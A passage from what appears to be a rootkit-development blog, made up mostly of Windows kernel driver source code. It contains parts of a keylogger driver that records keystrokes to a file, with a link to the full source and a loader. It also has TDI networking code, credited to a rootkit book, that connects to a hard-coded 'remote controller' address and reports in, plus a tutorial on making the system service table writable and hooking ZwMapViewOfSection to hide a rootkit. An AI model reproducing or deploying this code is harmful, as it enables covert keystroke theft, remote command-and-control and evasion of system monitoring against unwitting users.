	IN PVOID Context)

...

//After completing a request we remove the Irp from the EntryList:

                KeAcquireSpinLock( &keyboardData.irpLock, &aIrqL ); //second parameter is output

                { //this block remove the origIrp from the keyboardData.irpList because this irp processing is done and we don't need to do anything in case of cancelation or calling StopKeylogger function

                                PLIST_ENTRY listEntry;

                                listEntry = keyboardData.irpList.Flink; //next entry or the first entry when it is the header

                                while( (listEntry != &origIrp->Tail.Overlay.ListEntry)

                                                && (listEntry != &keyboardData.irpList) ) //This condition check if it is the end of the list

                                {

                                                listEntry = listEntry->Flink;

                                }

                                found = (listEntry == &origIrp->Tail.Overlay.ListEntry);

                                if( found )

                                                RemoveEntryList( &origIrp->Tail.Overlay.ListEntry ); //RemoveEntryList removes the entry by setting the Flink member of the entry before Entry to point to the entry after Entry, and the Blink member of the entry after Entry to point to the entry before Entry.

                                                //in fact removing it from origIrp->Tail.Overlay.ListEntry will remove it from the keyboardData.irpList listEntry since it contains the address of this entry

                }

                KeReleaseSpinLock( &keyboardData.irpLock, aIrqL );

...
}

 

And while unloading, we cancel the new IRP requests and call the driver t with original IRPs. Both the original and new Irps are saved in the keyboardData.irpList because by CONTAINING_RECORD( listEntry, IRP, Tail.Overlay.ListEntry) we retrieve the Irp record and after that by Irp->Tail.Overlay.ListEntry  and Irp->Tail.Overlay.DriverContext we have access to both Irps.

    

// keylogger source code
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
	...
	if( newKeyboardDevice )
		StopKeylogger( &oldKeyboardDevice, &newKeyboardDevice );

	...
}

void StopKeylogger( PDEVICE_OBJECT* ppOldDevice, //this function will be called from unload in driver
	PDEVICE_OBJECT* ppNewDevice )
{
...
            KeAcquireSpinLock( &keyboardData.irpLock, &irql ); //the second parameter is output and returns ths IRQL

                {

                                PLIST_ENTRY listEntry;

                                listEntry = keyboardData.irpList.Flink;

                                while( listEntry != &keyboardData.irpList ) //looping over the remaining irps

                                {

                                                PIRP newIrp, Irp;

 

                                                Irp = (PIRP)(CONTAINING_RECORD( listEntry, IRP, Tail.Overlay.ListEntry )); //the original irp

                                                newIrp = (PIRP)(Irp->Tail.Overlay.DriverContext[0]); //the newIrp we made

                                                // must advance listEntry before unlinking

                                                listEntry = listEntry->Flink;

                                                if( newIrp )

                                                {

                                                                // cancel created irp

                                                                if( IoCancelIrp( newIrp ) ) //if this (which means completion routine) does not cancel the system will crash

                                                                {

                                                                                // add original irp to forwarding list

                                                                                Irp->Tail.Overlay.DriverContext[0] = NULL;

                                                                                IoSetCancelRoutine( Irp, NULL ); //we do not use our cancelation routine, and we do not neither cancel the original irp request.

                                                                                RemoveEntryList( &Irp->Tail.Overlay.ListEntry ); //this line removes this entry from the listEntry

                                                                                InsertHeadList( &forwarding_list, &Irp->Tail.Overlay.ListEntry ); //adds the original Irp to the forwarding_list which then will be procesed normally by calling the driver without completion routin

                                                                }

                                                }

                                }

                }

                KeReleaseSpinLock( &keyboardData.irpLock, irql );

                // forward original irps

                while( !IsListEmpty( &forwarding_list ) )

                { //this block calls the driver with the original irp requests

                                PLIST_ENTRY listEntry;

                                PIRP Irp;

 

                                listEntry = RemoveHeadList( &forwarding_list );

                                Irp = (PIRP)(CONTAINING_RECORD( listEntry, IRP, Tail.Overlay.ListEntry ));

                                IoSkipCurrentIrpStackLocation( Irp );

                                IoCallDriver( oldKeyboardDevice, Irp );

                }
...
}

 


The complete Keylogger source code and a compiled version plus the rootkit loader can be downloaded from here. To learn how to compile and run the keylogger source code read the introduction to the rootkit development. After running the keylogger, open a text file and type and then stop the rootkit. Then open the C:\keys.txt file to see the successful keylogging.

Published in Rootkit development
Saturday, 30 May 2015 00:00

low level network programming

Low level network programming

Network programming in c are mostly done via sockets while in low level network programming you build the socket by the direct communication with the network driver. Low level network programming provides great power to control packets before any other applications even touch the packet. To process packets just after the network driver and before other applications such as a socket firewall you need to work with the Transport Driver Interface (TDI). Figure 1 shows how different layers communicate with network devices.

layers of networking

Figure 1 (layers of networking)

Access to the TDI APIs is possible by referencing ntddk.h but to access ntddk.h you need to write a driver and compile it with DDK. Since we are dealing with kernel, the low level network programming to connect to the network device and initiating connection from a device driver needs a lot of works. For connection in this level you must open the device, build an IRP (stack), and assign transport characteristics address and so on.

To do this you first need to open the device.

Opening the network device

Using the “/device/tcp” and the TdiTransportAddress predefined variable you can get the device HANDLE with ZwCreateFile. Then you can get the device object with ObReferenceObjectByHandle and open device with the IoGetRelatedDeviceObject function.

Building the IRP

For building an IRP you need the device pointer and also connection attributes. You have the first one from previous section, to get the second you use a FILE_FULL_EA_INFORMATION variable. This variable also used in previous section but its value differs now. We set the name value with TdiConnectionContext predefined variable. Then we build the IRP with TdiBuildInternalDeviceControlIrp function and tell the function that next we want to add address using TDI_ASSOCIATE_ADDRESS. Then we will call the driver to confirm using IoCallDriver.

Note: in both section we used the ZwCreateFile. Output of the first section is the address handle. But the result of the second one is the endpoint handle.

Preparing to connect

To establish connection with the server we call the TdiBuildInternalDeviceControlIrp with TDI_CONNECT parameter. Then we set a TDI_CONNECTION_INFORMATION variable with server address and port values and call the TdiBuildConnect. At the end we need to call the IoCallDriver again.

Sending Data in driver level

We first prepare the IRP using TdiBuildInternalDeviceControlIrp with TDI_SEND variable. Then we call the TdiBuildSend with the MDL allocated for the buffer to send. At the end we must call the IoCallDriver function.

Note: this process should be after connection establishment as was talked in previous section.

Codes here are taken from Professional Rootkits by Ric Vieler. Starting from the CommManager.h and CommManager.c, these files contain the definition of functions that initiate a device driver, connect to a server and send string data to the server:

// Copyright Ric Vieler, 2006
//c network programming
// Support header for commManager.c

#ifndef _COMM_MANAGER_H_

#define _COMM_MANAGER_H_

 

// TCP device name

#define COMM_TCP_DEVICE_NAME      L"\\Device\\Tcp"

 

// useful macros

#define INETADDR(a, b, c, d) (a + (b<<8) + (c<<16) + (d<<24))

#define HTONL(a) (((a&0xFF)<<24) + ((a&0xFF00)<<8) + ((a&0xFF0000)>>8) + ((a&0xFF000000)>>24)) 

#define HTONS(a) (((0xFF&a)<<8) + ((0xFF00&a)>>8))

 

#define RECEIVE_BUFFER_SIZE  1024

 

NTSTATUS OpenTDIConnection();

void CloseTDIConnection();

NTSTATUS SendToRemoteController( char* buffer );

VOID timerDPC( PKDPC Dpc, PVOID DeferredContext, PVOID sys1, PVOID sys2 );

 

#endif

 

// commManager.c
//c network programming // Copyright Ric Vieler, 2006 // This file supports a TDI connection to // masterAddress1.2.3.4 : masterPort #include <ntddk.h> #include <tdikrnl.h> #include <stdio.h> #include <stdlib.h> #include "commManager.h" #include "configManager.h" #include "driver.h" // Globals char* pSendBuffer = NULL; PMDL pSendMdl = NULL; PMDL pReceiveMdl = NULL; // not used for data recieving PFILE_OBJECT pFileObject = NULL; PDEVICE_OBJECT pDeviceObject = NULL; PKTIMER pKernelTimer = NULL; PKDPC pKernelDPC = NULL; PFILE_FULL_EA_INFORMATION pFileInfo = NULL; // Completion routine for all events (connect, send and receive) static NTSTATUS TDICompletionRoutine(IN PDEVICE_OBJECT theDeviceObject, IN PIRP theIrp, IN PVOID theContextP) { DbgPrint("comint32: TDICompletionRoutine()."); if( theContextP != NULL ) KeSetEvent( (PKEVENT)theContextP, 0, FALSE ); //The KeSetEvent routine sets an event object to a signaled state if the event was not already signaled, it means it signal the KeWaitForSingleObject. the second parameter defines the priority of signaled state. the third is false because no wait after that is required return( STATUS_MORE_PROCESSING_REQUIRED ); //this means no further IoCompletionRoutine will be called } // Open a TDI channel and connect to masterAddress1.2.3.4 : masterPort NTSTATUS OpenTDIConnection() { int port; int address1; int address2; int address3; int address4; NTSTATUS status; UNICODE_STRING TdiTransportDeviceName; OBJECT_ATTRIBUTES TdiAttributes; HANDLE TdiAddressHandle; HANDLE TdiEndpointHandle; IO_STATUS_BLOCK IoStatusBlock; PTA_IP_ADDRESS pAddress; CONNECTION_CONTEXT connectionContext = NULL; ULONG eaSize; PIRP pIrp; PVOID pAddressFileObject; KEVENT irpCompleteEvent; KEVENT connectionEvent; TA_IP_ADDRESS controllerTaIpAddress; ULONG controllerIpAddress; USHORT controllerPort; TDI_CONNECTION_INFORMATION controllerConnection; LARGE_INTEGER timeout; static char eaBuffer[ sizeof(FILE_FULL_EA_INFORMATION) + TDI_TRANSPORT_ADDRESS_LENGTH + sizeof(TA_IP_ADDRESS)]; PFILE_FULL_EA_INFORMATION pEaBuffer = (PFILE_FULL_EA_INFORMATION)eaBuffer; //The FILE_FULL_EA_INFORMATION structure provides extended attribute (EA) information. This structure is used primarily by network drivers. // Build Unicode transport device name. RtlInitUnicodeString( &TdiTransportDeviceName, COMM_TCP_DEVICE_NAME ); // "/device/tcp" // create object attribs InitializeObjectAttributes( &TdiAttributes, &TdiTransportDeviceName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, 0, 0 ); pEaBuffer->NextEntryOffset = 0; pEaBuffer->Flags = 0; pEaBuffer->EaNameLength = TDI_TRANSPORT_ADDRESS_LENGTH; // Copy TdiTransportAddress memcpy( pEaBuffer->EaName, TdiTransportAddress, //the client sets the EaName member to the SYSTEM-DEFINED value TdiTransportAddress pEaBuffer->EaNameLength + 1 ); // EaValue represents of the local host IP address and port pEaBuffer->EaValueLength = sizeof(TA_IP_ADDRESS); pAddress = (PTA_IP_ADDRESS) (pEaBuffer->EaName + pEaBuffer->EaNameLength + 1); //The value(s) associated with each entry follows the EaName array. That is, an EA's values are located at EaName + (EaNameLength + 1). pAddress->TAAddressCount = 1; pAddress->Address[0].AddressLength = TDI_ADDRESS_LENGTH_IP; pAddress->Address[0].AddressType = TDI_ADDRESS_TYPE_IP; pAddress->Address[0].Address[0].sin_port = 0; // any port pAddress->Address[0].Address[0].in_addr = 0; // local address memset( pAddress->Address[0].Address[0].sin_zero, 0, sizeof(pAddress->Address[0].Address[0].sin_zero) ); //to see the PTA_IP_ADDRESS structure go to: http://msdn.microsoft.com/en-us/library/windows/hardware/ff564243(v=vs.85).aspx // to see the pAddress->Address[0].Address[0] structure go to: http://msdn.microsoft.com/en-us/library/windows/hardware/ff565072(v=vs.85).aspx // Get the transport device status = ZwCreateFile( &TdiAddressHandle, //this is output GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE, &TdiAttributes, //A pointer to an OBJECT_ATTRIBUTES structure that specifies the object name and other attributes. TdiAttributes is initialized using InitializeObjectAttributes in line 73. In fact this specifies the device &IoStatusBlock, // output, A pointer to an IO_STATUS_BLOCK structure that receives the final completion status and other information about the requested operation 0, //AllocationSize FILE_ATTRIBUTE_NORMAL,//FileAttributes to set FILE_SHARE_READ,//ShareAccess FILE_OPEN,//Specifies the action to perform if the file does or does not exist 0, //Specifies the options to apply when the driver creates or opens the file pEaBuffer, //optional, For device and intermediate drivers, this parameter must be a NULL pointer. sizeof(eaBuffer) ); if( !NT_SUCCESS( status ) ) { DbgPrint("comint32: OpenTDIConnection() ZwCreate #1 failed, Status = %0x", status); return STATUS_UNSUCCESSFUL; } // get object handle status = ObReferenceObjectByHandle( TdiAddressHandle, FILE_ANY_ACCESS, //requested types of access to the object 0, //object type KernelMode, //Specifies the access mode to use for the access check. It must be either UserMode or KernelMode. (PVOID *)&pAddressFileObject, //Pointer to a variable that receives a pointer to the object's body NULL ); // Open a TDI endpoint eaSize = FIELD_OFFSET(FILE_FULL_EA_INFORMATION, EaName) + //The FIELD_OFFSET macro returns the byte offset of a named field in a known structure type. -> Type, Field . EaName is the last element TDI_CONNECTION_CONTEXT_LENGTH + 1 + //for the TdiConnectionContext constant sizeof(CONNECTION_CONTEXT); // CONNECTION_CONTEXT object must be able to contain connection objects. There is only one connection in this example, so CONNECTION_CONTEXT is not used // Overwrite pEaBuffer pFileInfo = (PFILE_FULL_EA_INFORMATION)ExAllocatePool(NonPagedPool, eaSize); //global. will be used to open connection. ExAllocatePool allocates pool memory of the specified type and returns a pointer to the allocated block. if( pFileInfo == NULL ) { DbgPrint("comint32: OpenTDIConnection() failed to allocate buffer"); return STATUS_INSUFFICIENT_RESOURCES; } // Set file info memset(pFileInfo, 0, eaSize); pFileInfo->NextEntryOffset = 0; pFileInfo->Flags = 0; pFileInfo->EaNameLength = TDI_CONNECTION_CONTEXT_LENGTH; memcpy( pFileInfo->EaName, //pFileInfo is for connection initiation but pEaBuffer is for openning Device object. for pEaBuffer the EaName is TdiTransportAddress TdiConnectionContext, pFileInfo->EaNameLength + 1 ); //includes NULL terminator // CONNECTION_CONTEXT is a user defined structure used to sort connections // There is only one connection in this example, so CONNECTION_CONTEXT is not used pFileInfo->EaValueLength = sizeof(CONNECTION_CONTEXT); *(CONNECTION_CONTEXT*)(pFileInfo->EaName+(pFileInfo->EaNameLength + 1)) = //thie is the place of the value (of EaName object) which we're telling it is after the EaName (CONNECTION_CONTEXT) connectionContext; //null status = ZwCreateFile( &TdiEndpointHandle, GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE, &TdiAttributes, &IoStatusBlock, 0, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, pFileInfo, //pFileInfo size is different than pEaBuffer sizeof(eaBuffer) ); if( !NT_SUCCESS( status ) ) { DbgPrint("comint32: OpenTDIConnection() ZwCreate #2 failed, Status = %0x", status); return STATUS_UNSUCCESSFUL; } // get object handle status = ObReferenceObjectByHandle( TdiEndpointHandle, FILE_ANY_ACCESS, 0, KernelMode, (PVOID *)&pFileObject, //output. for the TdiBuildInternalDeviceControlIrp ; global var NULL ); // Associate endpoint with address pDeviceObject = IoGetRelatedDeviceObject( pAddressFileObject ); //global var. Returns PDEVICE_OBJECT that is a pointer to the driver object. Here we used pAddressFileObject because the pAddressFileObject was opened using pEaBuffer and its var EaName got value with TdiTransportAddress // Define a completion event KeInitializeEvent( &irpCompleteEvent, NotificationEvent, FALSE ); // Build IO Request Packet. //TdiBuildInternalDeviceControlIrp allocates an IRP for a client-initiated internal device control request pIrp = TdiBuildInternalDeviceControlIrp( TDI_ASSOCIATE_ADDRESS, //The caller will pass the returned IRP to TdiBuildAssociateAddress. TdiBuildXxx macro with the returned IRP to set up the I/O stack location of the underlying transport driver before making the request with IoCallDriver pDeviceObject, pFileObject, &irpCompleteEvent, &IoStatusBlock ); if( pIrp == NULL ) { DbgPrint("comint32: No IRP for TDI_ASSOCIATE_ADDRESS"); return( STATUS_INSUFFICIENT_RESOURCES ); } // Extend the IRP TdiBuildAssociateAddress(pIrp, //sets up an internal device control IRP for a TDI_ASSOCIATE_ADDRESS request to the underlying transport in which a local-node client has already opened an address and a connection endpoint pDeviceObject, pFileObject, //Pointer to a file object representing the connection endpoint NULL, NULL, TdiAddressHandle ); //the Address // set completion routine IoSetCompletionRoutine( pIrp, TDICompletionRoutine, &irpCompleteEvent, TRUE, TRUE, TRUE); //When any drivers completes an IRP, it calls IoCompleteRequest, which in turn that method calls the IoCompletion routine of each higher-level driver, from the next-highest to the highest, until all higher IoCompletion routines have been called or until one routine returns STATUS_MORE_PROCESSING_REQUIRED. This function tores the IoCompletion routine's address in the next-lower driver's I/O stack location // third parameter is context like an EVENT. 4,5 and 6 parameter tells to call in order when Success, error, cancel // Send the packet status = IoCallDriver( pDeviceObject, pIrp ); //pIrp is also output in case of success // Wait if( status == STATUS_PENDING ) { DbgPrint("comint32: OpenTDIConnection() Waiting on IRP (associate)..."); KeWaitForSingleObject(&irpCompleteEvent, Executive, KernelMode, FALSE, 0);// if it has to wait, it waits and then after that it is free to go -- it means the packet is processed- the execution flows to the next line //since the completion routine of pIrp is set to TDICompletionRoutine, when the request is processed ( IoCallDriver( pDeviceObject, pIrp ) ) the TDICompletionRoutine will be called and this means that KeSetEvent is called so If the event is a notification event (which is), the system attempts to satisfy as many waits as possible on the event object which means it signal this line to move further } if( ( status != STATUS_SUCCESS) && ( status != STATUS_PENDING ) ) { DbgPrint("comint32: OpenTDIConnection() IoCallDriver #1 failed. Status = %0x", status); return STATUS_UNSUCCESSFUL; } // Connect to the remote controller KeInitializeEvent(&connectionEvent, NotificationEvent, FALSE); // build connection packet pIrp = TdiBuildInternalDeviceControlIrp( TDI_CONNECT, //The caller will pass the returned IRP to TDI_CONNECT pDeviceObject, pFileObject, &connectionEvent, &IoStatusBlock ); if( pIrp == NULL ) { DbgPrint("comint32: OpenTDIConnection() could not get an IRP for TDI_CONNECT"); return( STATUS_INSUFFICIENT_RESOURCES ); } // Initialize controller data address1 = atoi(masterAddress1); address2 = atoi(masterAddress2); address3 = atoi(masterAddress3); address4 = atoi(masterAddress4); port = atoi(masterPort); controllerPort = HTONS(port); controllerIpAddress = INETADDR(address1,address2,address3,address4); controllerTaIpAddress.TAAddressCount = 1; controllerTaIpAddress.Address[0].AddressLength = TDI_ADDRESS_LENGTH_IP; controllerTaIpAddress.Address[0].AddressType = TDI_ADDRESS_TYPE_IP; controllerTaIpAddress.Address[0].Address[0].sin_port = controllerPort; controllerTaIpAddress.Address[0].Address[0].in_addr = controllerIpAddress; controllerConnection.UserDataLength = 0; controllerConnection.UserData = 0; controllerConnection.OptionsLength = 0; controllerConnection.Options = 0; controllerConnection.RemoteAddressLength = sizeof(controllerTaIpAddress); controllerConnection.RemoteAddress = &controllerTaIpAddress; // add controller data to the packet. TdiBuildConnect sets IRP_MJ_INTERNAL_DEVICE_CONTROL as the MajorFunction and TDI_CONNECT as the MinorFunction codes in the transport's I/O stack location of the given IRP TdiBuildConnect( pIrp, pDeviceObject,//Pointer to the device object created by the underlying TDI transport driver. pFileObject,//Pointer to a file object representing the connection endpoint NULL,//CompRoutine NULL, NULL,//Time &controllerConnection,//RequestConnectionInfo 0 ); // set completion routine IoSetCompletionRoutine( pIrp, TDICompletionRoutine, &connectionEvent, TRUE, TRUE, TRUE); // Send the packet status = IoCallDriver( pDeviceObject, pIrp ); // wait if( status == STATUS_PENDING ) { DbgPrint("comint32: OpenTDIConnection() waiting on IRP (connect)..."); KeWaitForSingleObject(&connectionEvent, Executive, KernelMode, FALSE, 0);// if it has to wait, it waits and then after that it is free to go -- it means the packet is processed- } if( ( status != STATUS_SUCCESS ) && ( status != STATUS_PENDING ) ) { DbgPrint("comint32: OpenTDIConnection() Connection failed. Status = %0x", status); return( STATUS_UNSUCCESSFUL ); } // Start a Deferred Procedure Call // Objects must be non paged pKernelTimer = ExAllocatePool( NonPagedPool, sizeof( KTIMER ) ); //global pKernelDPC = ExAllocatePool( NonPagedPool, sizeof( KDPC ) ); //global timeout.QuadPart = -10; KeInitializeTimer( pKernelTimer ); KeInitializeDpc( pKernelDPC, timerDPC, NULL ); if( KeSetTimerEx( pKernelTimer, timeout, 500, pKernelDPC ) ) // 1/2 second. The KeSetTimerEx routine sets the absolute or relative interval at which a timer object is to be set to a signaled state { DbgPrint("comint32: OpenTDIConnection() Timer was already set."); } return STATUS_SUCCESS; } // Clean up void CloseTDIConnection() { KeCancelTimer( pKernelTimer ); ExFreePool( pKernelTimer ); ExFreePool( pKernelDPC ); if( pFileInfo != NULL ) ExFreePool( pFileInfo ); if( pKernelTimer == NULL ) ExFreePool( pKernelTimer ); if( pKernelDPC == NULL ) ExFreePool( pKernelDPC ); if( pSendBuffer != NULL ) ExFreePool( pSendBuffer ); if( pSendMdl != NULL ) IoFreeMdl( pSendMdl ); if( pReceiveMdl != NULL ) IoFreeMdl( pReceiveMdl ); } NTSTATUS SendToRemoteController( char* buffer ) { NTSTATUS status; ULONG bufferLength; KEVENT SendEvent; PIRP pIrp; IO_STATUS_BLOCK IoStatusBlock; KeInitializeEvent( &SendEvent, NotificationEvent, FALSE ); bufferLength = strlen( buffer ); if( pSendBuffer != NULL ) //global ExFreePool( pSendBuffer ); pSendBuffer = ExAllocatePool( NonPagedPool, bufferLength ); memcpy( pSendBuffer, buffer, bufferLength ); // build an IO Request Packet pIrp = TdiBuildInternalDeviceControlIrp( TDI_SEND, pDeviceObject, pFileObject, //global. got value in previous function (openning connection) &SendEvent, &IoStatusBlock ); if( pIrp == NULL ) { DbgPrint( "comint32: SendToRemoteController() could not get an IRP for TDI_SEND" ); return( STATUS_INSUFFICIENT_RESOURCES ); } if( pSendMdl != NULL ) //global IoFreeMdl( pSendMdl ); pSendMdl = IoAllocateMdl( pSendBuffer, bufferLength, FALSE, FALSE, pIrp ); if( pSendMdl == NULL ) { DbgPrint("comint32: SendToRemoteController() could not get an MDL for TDI_SEND"); return( STATUS_INSUFFICIENT_RESOURCES ); } __try { MmProbeAndLockPages( pSendMdl, KernelMode, IoModifyAccess ); } __except( EXCEPTION_EXECUTE_HANDLER ) { DbgPrint("comint32: SendToRemoteController() ProbeAndLock exception."); return( STATUS_UNSUCCESSFUL ); } // Extend the packet TdiBuildSend( pIrp, pDeviceObject, pFileObject, NULL, NULL, pSendMdl, 0, bufferLength ); // set completion routine IoSetCompletionRoutine( pIrp, TDICompletionRoutine, &SendEvent, TRUE, TRUE, TRUE); // Send the packet status = IoCallDriver( pDeviceObject, pIrp ); // wait if( status == STATUS_PENDING ) { DbgPrint("comint32: SendToRemoteController() waiting on IRP (send)..."); KeWaitForSingleObject( &SendEvent, Executive, KernelMode, FALSE, 0 ); } if( ( status != STATUS_SUCCESS ) && ( status != STATUS_PENDING ) ) { DbgPrint("comint32: SendToRemoteController() Send failed. Status = %0x", status); return( STATUS_UNSUCCESSFUL ); } return STATUS_SUCCESS; } // called periodically VOID timerDPC( PKDPC Dpc, PVOID DeferredContext, PVOID sys1, PVOID sys2 ) { // poll for commands }

 

 

// Copyright Ric Vieler, 2004
//ConfigManager.h
//c network programming
#ifndef _CONFIG_MANAGER_H_ #define _CONFIG_MANAGER_H_ char masterPort[10]; char masterAddress1[4]; char masterAddress2[4]; char masterAddress3[4]; char masterAddress4[4]; NTSTATUS Configure(); #endif

 

// Copyright Ric Vieler, 2004
// driver.h

#ifndef _GHOST_H_
#define _GHOST_H_

#define _GHOST_ROOTKIT_

typedef unsigned long	DWORD;
typedef int				BOOL;
typedef unsigned char	BYTE;
typedef unsigned short	WORD;
typedef float			FLOAT;
typedef FLOAT*			PFLOAT;
typedef BOOL*			PBOOL;
typedef BYTE*			PBYTE;
typedef int*			PINT;
typedef WORD*			PWORD;
typedef DWORD*			PDWORD;
typedef DWORD*			LPDWORD;
typedef int				INT;
typedef unsigned int	UINT;
typedef unsigned int*	PUINT;
typedef long*			LPLONG;

typedef void*			PVOID;
#define LPVOID			PVOID
typedef PVOID			FARPROC;
typedef const void*		LPCVOID;

typedef struct _SECURITY_ATTRIBUTES
{
    DWORD nLength;
    LPVOID lpSecurityDescriptor;
    BOOL bInheritHandle;
} SECURITY_ATTRIBUTES, *PSECURITY_ATTRIBUTES, *LPSECURITY_ATTRIBUTES;

typedef struct _OVERLAPPED
{
    DWORD   Internal;
    DWORD   InternalHigh;
    DWORD   Offset;
    DWORD   OffsetHigh;
    HANDLE  hEvent;
} OVERLAPPED, *LPOVERLAPPED;

typedef struct _DRIVER_DATA
{
   LIST_ENTRY listEntry;
   DWORD  unknown1;
   DWORD  unknown2;
   DWORD  unknown3;
   DWORD  unknown4;
   DWORD  unknown5;
   DWORD  unknown6;
   DWORD  unknown7;
   UNICODE_STRING path;
   UNICODE_STRING name;
} DRIVER_DATA;

#define CREATE_NEW          1
#define CREATE_ALWAYS       2
#define OPEN_EXISTING       3
#define OPEN_ALWAYS         4
#define TRUNCATE_EXISTING   5

#define INVALID_HANDLE_VALUE  ((HANDLE)((LONG_PTR)-1))

#endif

 

Above files are intended to be invoked by the driver entry function

// driver.c
// Copyright Ric Vieler, 2006
//c network programming
#include "ntddk.h"
#include "driver.h"
#include "configManager.h"
#include "commManager.h"

// Global version data
ULONG majorVersion;
ULONG minorVersion;


VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
    UNICODE_STRING deviceLink = { 0 };

	// Close the connection to remote controller
	CloseTDIConnection();

}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
	DRIVER_DATA* driverData;
    UNICODE_STRING deviceName = { 0 };
    UNICODE_STRING deviceLink = { 0 };
	PDEVICE_OBJECT pDeviceController;

	// Get the operating system version
	PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

	// Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95
	// Major = 5: Windows Server 2003, Windows XP or Windows 2000
	// Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95
	// Minor = 1: Windows XP
	// Minor = 2: Windows Server 2003

	if ( majorVersion == 5 && minorVersion == 2 )
	{
		DbgPrint("comint32: Running on Windows 2003");
	}
	else if ( majorVersion == 5 && minorVersion == 1 )
	{
		DbgPrint("comint32: Running on Windows XP");
	}
	else if ( majorVersion == 5 && minorVersion == 0 )
	{
		DbgPrint("comint32: Running on Windows 2000");
	}
	else if ( majorVersion == 4 && minorVersion == 0 )
	{
		DbgPrint("comint32: Running on Windows NT 4.0");
	}
	else
	{
		DbgPrint("comint32: Running on unknown system");
	}


	// Get the remote controller's address and port
	masterPort="01234";
    masterAddress1="192";
    masterAddress2="168";
    masterAddress3="20";
    masterAddress4="16";

	// Open the connection to remote controller
	if( !NT_SUCCESS( OpenTDIConnection() ) )
	{
		DbgPrint("comint32: Could not open remote connection.\n");		
		return STATUS_UNSUCCESSFUL;
	}

	// Tell remote controller that we're here
	SendToRemoteController( "207.26.40.60" ); 
	
	pDriverObject->DriverUnload = OnUnload; 
	
	return STATUS_SUCCESS;
}
Published in Network Programming
Saturday, 30 May 2015 00:00

Kernel hooks | Kernel Hacking

Kernel hooks | Kernel Hacking

Modifying an OS’s API functionality is possible through kernel hooks. By invoking a kernel hook many examples of rootkits disrupt monitoring mechanism of OS and conceal your rootkit. System calls are registered in the operating system service table so when an application calls an API, OS first looks in this table and then locate the API and invoke it. Theoretically placement of a kernel hook is as easy as putting the address of your choice in this table but this table is locked and you cannot modify it. Therefor the real challenge in the rootkit source code is making this table writable!

As you may know, access to the memory by OS is possible through pages. Pages represent a portion of virtual addresses and map virtual addresses to physical ones. Pages have a set of flags and write privilege is defined using these flags. To make the system service table writable we exploit windows kernel and deceive it i.e. we do not use the pages and the access OS provides to the system service table; we map the virtual address that points to the system service table to a physical page with custom defined flags.

The Service Descriptor Table virtual address can be imported from ntdll:

#pragma pack(1)

typedef struct ServiceDescriptorEntry

{

 unsigned int *ServiceTableBase;

 unsigned int *ServiceCounterTableBase;

 unsigned int NumberOfServices;

  unsigned char *ParamTableBase;

} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;

#pragma pack()

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

 

Instead of accessing the table with this variable (because it is not writable) we use another page to map this virtual address:

pMyMDL = MmCreateMdl(NULL,

  KeServiceDescriptorTable.ServiceTableBase,

  KeServiceDescriptorTable.NumberOfServices * 4 );


 if( !pMyMDL )

  return( STATUS_UNSUCCESSFUL );

 
 MmBuildMdlForNonPagedPool( pMyMDL );

 pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;

 NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode );

 

After mapping the system service table virtual address to a writable physical address we locate the API to be hooked (by using its pointer which is the relative address to the system service table) in the writable system service table and simply change the address to point to our code. For future possible kernel exploits we keep the reference to the original API (ZwMapViewOfSection).

#define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1)

#define HOOK(functionName, newPointer2Function, oldPointer2Function )  oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function)

HOOK( ZwMapViewOfSection, NewZwMapViewOfSection, OldZwMapViewOfSection );

 

Below are the complete codes to hook the ZwMapViewOfSection. Please note that compiling these codes only with DDK (Driver Development kit) is possible and the output is a driver which needs to be loaded.

//hookManager.h

#ifndef _HOOK_MANAGER_H_

#define _HOOK_MANAGER_H_

 

// The kernel's Service Descriptor Table

#pragma pack(1) //packing structure means for example instead of 16 bytes for this data structure it only gets the actual size which is 8 byte (in normal situation because of 32bit memory addresses the compiler saves vars in 4 byte chunks)

typedef struct ServiceDescriptorEntry // typedef makes our job easy beacuse we do not need to use struct keyword before defining a var tyoe

{

 unsigned int *ServiceTableBase;

 unsigned int *ServiceCounterTableBase;

 unsigned int NumberOfServices;

  unsigned char *ParamTableBase;

} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; // here we defines the actual type "ServiceDescriptorTableEntry_t" and its pointer "PServiceDescriptorTableEntry_t"

#pragma pack()

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; //__declspec(dllimport) imports KeServiceDescriptorTable variable from the ntdll, its type is ServiceDescriptorTableEntry_t

 

// Our System Call Table

extern PVOID* NewSystemCallTable; //because of being global needs to use extern, in ntddk.h

 

// Our Memory Descriptor List

extern PMDL pMyMDL; //in ntddk.h

 

#define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1) // get the address of function2hook

 

#define HOOK(functionName, newPointer2Function, oldPointer2Function )  oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function)

 

#define UNHOOK(functionName, oldPointer2Function)  \

 InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) \

oldPointer2Function)

 

typedef NTSTATUS (*ZWMAPVIEWOFSECTION)( //defining this pointer type for casting return value of InterlockedExchange

 IN HANDLE SectionHandle,

 IN HANDLE ProcessHandle,

 IN OUT PVOID *BaseAddress,

 IN ULONG ZeroBits,

 IN ULONG CommitSize,

 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,

 IN OUT PSIZE_T ViewSize,

 IN SECTION_INHERIT InheritDisposition,

 IN ULONG AllocationType,

 IN ULONG Protect );

 

